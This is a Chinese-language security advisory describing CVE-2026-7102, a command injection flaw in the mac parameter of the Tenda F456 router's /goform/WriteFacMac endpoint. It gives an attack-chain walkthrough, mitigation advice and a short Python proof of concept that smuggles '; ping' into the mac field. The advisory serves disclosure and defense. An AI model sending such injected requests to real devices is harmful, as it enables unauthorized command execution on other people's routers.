IPBUF安全漏洞报告
English
CVE-2026-7102 CVSS 6.3 中危

CVE-2026-7102 Tenda F456命令注入漏洞

披露日期: 2026-04-27
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7102
漏洞类型
命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Tenda F456

相关标签

命令注入Tenda路由器RCECVE-2026-7102IoT

漏洞概述

Tenda F456 1.0.0.5版本存在命令注入漏洞。该漏洞源于组件httpd中/goform/WriteFacMac文件的FromWriteFacMac函数对参数mac的处理不当。攻击者可通过操纵该参数注入恶意命令,由于攻击复杂度低且无需用户交互,低权限攻击者即可远程利用此漏洞执行任意命令,可能导致系统完整性、机密性和可用性受损。目前该漏洞利用代码已公开披露。

技术细节

该漏洞位于Tenda F456路由器的Web服务器接口(httpd)中。具体而言,当处理/goform/WriteFacMac接口的请求时,FromWriteFacMac函数负责解析用户输入的mac地址参数。由于代码未对该参数进行严格的特殊字符过滤(如分号、管道符等),攻击者可以将恶意的Shell命令拼接至正常参数后。当后端程序调用系统执行函数处理该参数时,恶意命令将被操作系统执行。考虑到CVSS向量中的PR:L(低权限),攻击者可能需要经过身份认证才能触发该接口,成功利用后可获得设备上的有限执行权限。

攻击链分析

STEP 1
侦察
攻击者识别网络中存在的Tenda F456路由器,并确定其固件版本为1.0.0.5。
STEP 2
访问与认证
攻击者获取路由器的低权限访问(如登录Web管理界面),满足CVSS PR:L的要求。
STEP 3
漏洞利用
攻击者向/goform/WriteFacMac端点发送特制的POST请求,在'mac'参数中注入恶意命令。
STEP 4
命令执行
后端系统未过滤特殊字符,直接将参数传递给系统调用,导致恶意命令在设备操作系统层面执行。
STEP 5
影响达成
攻击者成功执行任意命令,可能导致敏感信息泄露、文件被篡改或服务拒绝。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (replace with actual IP) target_url = "http://192.168.0.1/goform/WriteFacMac" # Vulnerable payload: mac parameter ending with a semicolon to inject command # Example payload tries to ping a controlled server to verify blind RCE payload_data = { "mac": "AA:BB:CC:DD:EE:FF; ping 192.168.0.100" } try: # Sending the exploit request response = requests.post(target_url, data=payload_data) if response.status_code == 200: print("Request sent successfully. Check for command execution.") else: print(f"Request failed with status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")

影响范围

Tenda F456 1.0.0.5

防御指南

临时缓解措施
如果无法立即升级固件,建议暂时关闭路由器的远程Web管理功能,并确保仅受信任的局域网设备可以访问管理后台。同时,监控网络流量中针对/goform/WriteFacMac路径的异常请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表